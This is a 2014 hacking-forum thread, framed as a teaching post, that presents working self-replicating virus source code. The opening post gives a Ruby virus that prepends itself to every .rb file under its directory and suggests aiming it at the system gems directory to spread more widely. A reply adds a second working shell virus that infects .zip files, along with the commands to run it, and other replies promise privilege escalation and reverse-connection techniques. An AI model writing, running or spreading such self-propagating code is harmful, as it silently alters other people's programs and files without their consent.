Ruby Very Basic Virus Demonstration & Methodology

The constant threat: viruses, trojans, spyware, ... the list goes on

Ruby Very Basic Virus Demonstration & Methodology

Post by -Ninjex- on Tue Jan 21, 2014 12:01 pm
([msg=79022]see Ruby Very Basic Virus Demonstration & Methodology[/msg])

In computer terminology, a virus is a program that can infect other programs, by embedding a (possibly better) copy of itself inside that program. What makes viruses fun to work with, is their ability to spread throughout the machine and infect files of different levels of access.
For example, say a standard user downloads a '.ogv' porn video that is infected, and plays the video, in turn infecting all '.ogv' files inside that users /videos/ directory. A system administrator may be browsing through the standard users history, and notice he may have downloaded a porn video. He then in turn goes to the users /video/ directory, but doesn't find the video (because the standard user deleted it). He then gets curious, thinking that maybe the name was changed, so he clicks and plays a random '.ogv' video from inside the directory. This action in turn will cause all '.ogv' videos inside the Administrators /videos/ directory to now become infected; essentially escalating the privileges and control the virus has.

A common falsity is that viruses, are programs that are used to spread through a network (while this can be true), a virus is only considered a virus if it is actually infecting other programs, not just simply spreading through the network.
The methodology is Simple:
If user Fred runs virus.exe infecting program.exe and then Tom runs program.exe, then Tom becomes infected as well.
Another misconception is that viruses are always malicious pieces of code. This is not always true; in the example I will show you, the code is harmless, but does qualify and fit the standards of a virus.

Before we dive into the code, let's talk about what needs to happen.
Have something to distinguish already infected files, to prevent them from being infected again.
Grab a program, and check if it has the distinguishing tag
If it does, it's already infected, so we need to grab a new file instead
If it does not, it has not yet been infected, so we embed the virus code inside the program
We need a end tag on our virus so that programs don't overwrite their own data into other programs as well
To pull this off, I recommend first renaming the file to be infected as tmp.ext, then writing the contents of the virus to the name of what the old name of the file was, and then append the text from tmp.ext back to the file; lastly remove the tmp.ext file. This will make sure that our virus is running first, and it makes it easier to find distinguished tags from the top of the file.

The code:
Code: Select all
#0x3a
#!/usr/bin/ruby
def infect_files
  count = 0     # This will halt content reading after the virus_bottom tag
  virus_top     = '#0x3a'       # Distinguishing tag telling us if the file is infected or not
  virus_bottom  = '#:'          # Tag at the bottom of the virus to as a marker of what code to infect other programs with
  files = Dir["./**/*.rb"]      # Grab all the ruby files in the directory of the infected file.

  files.each do |random_file|   # For each ruby file in the same directory as the infected file

    first_line = File.open(random_file, &:gets).strip # Grab the first line (to check the distinguishing tag at the top)

    if first_line != virus_top  # If the program is not infected
      File.rename(random_file, 'tmp.rb') # Rename the normal file to tmp.rb
      virus_file = File.open(__FILE__, "rb") # Open infecting file for reading
      virus_contents = '' # Storing virus data until virus_bottom is hit
      # This is necessary to prevent programs from writing their own content when embedding to other programs
      virus_file.each_line do |line| # for every line in the infected file
        virus_contents += line  # Add each line to our virus content
        if line =~ /#{virus_bottom}/
          count += 1
          if count == 2 then break end # Until we hit the virus_bottom tag
        end
      end
      File.open(random_file, 'w') {|f| f.write(virus_contents) } # Write virus content to the old file's name
      good_file = File.open('tmp.rb', 'rb') # Open the tmp.rb file (contains good code) for reading
      good_contents = good_file.read # Grab the contents of the good file
      File.open(random_file, 'a') {|f| f.write(good_contents)} # Append the good content to the random file
      File.delete('tmp.rb') # Delete the temporary file
    end
  end
end

infect_files # Run the virus
#:


Simply this virus will take every ruby file in the same directory as it, and infect it with the same code. The code's only function is to embed itself in more programs, so therefor it's not really malicious albeit still a virus.

Some pictures and details:
The virus:
Image

Two scripts to test, blah.rb and test.rb:
Image
Image

Infecting the files:
Image

It appears nothing happened, but let's take a look inside blah.rb's source code again:
Image

Now it is infected and is in turn a virus, let's go back to the terminal and run the program and see if it 'looks' normal:
Image

That's exactly what the code did before, minus the infecting >:}

If this file were to be moved into another directory it would affect all ruby scripts in that directory. We could also target /* files, but namely for ruby it would just be wise to target the /var/libs/gems/**/*.rb directory as this location holds a lot of files that get used when running ruby programs in general.

Maybe next time I will demonstrate how this can be dangerous with escalating privileges or demonstrate an virus that can adapt or mutate to make it more efficient. But for now, I thought this may be interesting to some albeit very basic.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
^(-.^)>
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1468
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by fashizzlepop on Tue Jan 21, 2014 4:28 pm
([msg=79027]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

Nice post, Ninjex. Hopefully people read this before posting questions about viruses in the future.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.
User avatar
fashizzlepop
Developer
Developer
 
Posts: 2303
Joined: Sat May 24, 2008 1:20 pm
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by Goatboy on Tue Jan 21, 2014 6:42 pm
([msg=79028]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

I'm glad you used an interpreted language for this. People usually associate virii with compiled languages, which is a dangerous assumption to make.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by tgoe on Wed Jan 22, 2014 2:29 am
([msg=79033]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

Nice work :) But I have a couple bugaboos here.
A virus is a program that can "infect" other *files* and you shouldn't ever place anything before the shebang, not even an infection marker.

The code's only function is to embed itself in more programs, so therefor it's not really malicious


Not virii but:
"Not written to cause damage"
"Just copied itself" *

demonstrate an virus that can adapt or mutate

In Ruby? I don't know Ruby. But I wanna see that.

---
* Still my fav piece of malware of all time. "The worm infected new hosts over UDP, and the entire worm (only 376 bytes) fits inside a single packet."

OT: What editor is that in the pics? Sublime? Is that a pretty Vim?
User avatar
tgoe
Contributor
Contributor
 
Posts: 668
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by -Ninjex- on Wed Jan 22, 2014 6:55 am
([msg=79042]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

tgoe wrote:Nice work :) But I have a couple bugaboos here.
A virus is a program that can "infect" other *files* and you shouldn't ever place anything before the shebang, not even an infection marker.

This is straight from from wiki.
A computer virus is a type of malware that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected"

This indicates to me, that a virus 'has' to infect another file(s) in order to gain it's title as a virus.
I would also agree with the shebang, I just felt like handling the tag in a nerdy one liner; I will be sure to change it in the next overview.
tgoe wrote:
demonstrate an virus that can adapt or mutate

In Ruby? I don't know Ruby. But I wanna see that.

OT: What editor is that in the pics? Sublime? Is that a pretty Vim?


I have a plans to demonstrate the dangers of a virus and how it can possibly escelate into root priveleges, and what can be done from there. After this, I will be brainstorming an adapting or mutating virus; somehow 0.o
*** Edit ***
I may have thought of a pretty nerdy way to tie both into one virus, but I'll have to test it out :D

Bingo on the Text editor; I use Sublime Text 3 with Sunburst color scheme.
Sublime is an all time favorite GUI editor, if I work in a terminal it's usually in nano, since I haven't forced myself to constructively learn vim or vi.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
^(-.^)>
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1468
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by e3cb on Mon Jan 27, 2014 9:42 am
([msg=79147]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

H-hey Ninjex..... hey Ninjex! I may have some... things that could, ya know, demonstrate priv escalation and reverse connection. <3
<3 FF E4 <3
Do you even asm bruh?
User avatar
e3cb
Experienced User
Experienced User
 
Posts: 65
Joined: Fri Feb 15, 2013 11:32 pm
Location: Orange County
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by limdis on Tue Jan 28, 2014 8:14 pm
([msg=79174]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

Ninjex +1
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1434
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by tgoe on Wed Jan 29, 2014 1:28 pm
([msg=79193]see Re: Ruby Very Basic Virus Demonstration & Methodology[/msg])

@ninjex

Yeah, I was trying to be more precise. Your post stated that a virus is "a program that can infect other programs" and "a virus is only considered a virus if it is actually infecting other programs". You mention an implied '.ogv' exploit but it should be clear that in that case the actual binary that processes the '.ogv' file needn't be infected. For example, programs that process '.zip' files can be pretty lenient on accepted input:

Code: Select all
#!/bin/sh

# zip_virus.sh

unzip "$0"
for ZIP in `ls *\.zip`; do
    if [ "`head -1 $ZIP`" != '#/bin/sh' ]; then
        mv "$ZIP" "$ZIP.tmp";
        head -14 "$0" > "$ZIP"
        cat "$ZIP.tmp" >> "$ZIP"
        rm "$ZIP.tmp";
        chmod +x "$ZIP"
    fi
done; exit


Code: Select all
$ cat zip_virus.sh > infected.zip; cat valid.zip >> infected.zip; chmod +x infected.zip


Try this in a directory of .zip files:
Code: Select all
$ unzip infected.zip
$ ./infected.zip


Granted, this virus has a snowball's chance in hell without a file manager that gives the executable bit priority over the file extension... But there it is. A virus that can spread without infecting programs.

Also, I mentioned those worms because even benign malware is still malware.
User avatar
tgoe
Contributor
Contributor
 
Posts: 668
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)



Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests